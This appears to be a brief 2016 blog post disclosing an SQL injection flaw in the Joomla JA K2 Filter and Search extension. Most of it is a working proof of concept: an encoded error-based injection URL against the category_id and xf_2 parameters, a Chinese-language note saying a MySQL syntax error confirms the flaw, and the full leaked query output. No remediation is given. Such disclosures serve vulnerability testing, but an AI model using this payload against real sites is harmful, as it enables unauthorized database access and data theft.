MENU

Joomla Ja-K2-Filter-And-Search SQL Injection Vulnerability

October 20, 2016 • Security

POC

/index.php?category_id=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHAR(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)%2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5%27

输出结果,出现如下内容(包含:You have an error in your SQL syntax;)表示漏洞存在:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"') AND (i.fulltext LIKE '%the%') ORDER BY i.id DESC LIMIT 0, 9' at line 1 SQL=SELECT DISTINCT i.*, CASE WHEN i.modified = 0 THEN i.created ELSE i.modified END as lastChanged, c.name as categoryname,c.id as categoryid, c.alias as categoryalias, c.params as categoryparams FROM #__k2_items as i RIGHT JOIN #__k2_categories AS c ON c.id = i.catid WHERE i.published = 1 AND i.access IN(1,1,5) AND i.trash = 0 AND c.published = 1 AND c.access IN(1,1,5) AND c.trash = 0 AND ( i.publish_up = '0000-00-00 00:00:00' OR i.publish_up <= '2016-10-20 03:44:31' ) AND ( i.publish_down = '0000-00-00 00:00:00' OR i.publish_down >= '2016-10-20 03:44:31' ) AND i.catid IN ((select 1 and row(1, 1)>(select count(*), concat(concat(CHAR(52), CHAR(67), CHAR(117), CHAR(117), CHAR(82), CHAR(57), CHAR(71), CHAR(65), CHAR(77), CHAR(98), CHAR(77)), floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))) AND (i.extra_fields REGEXP '{"id":"2","value":[^{]*"5'"') AND (i.fulltext LIKE '%the%') ORDER BY i.id DESC LIMIT 0, 9

ja-k2-filter-and-search-Joomla-flaw.png

Archives QR Code
QR Code for this page
Tipping QR Code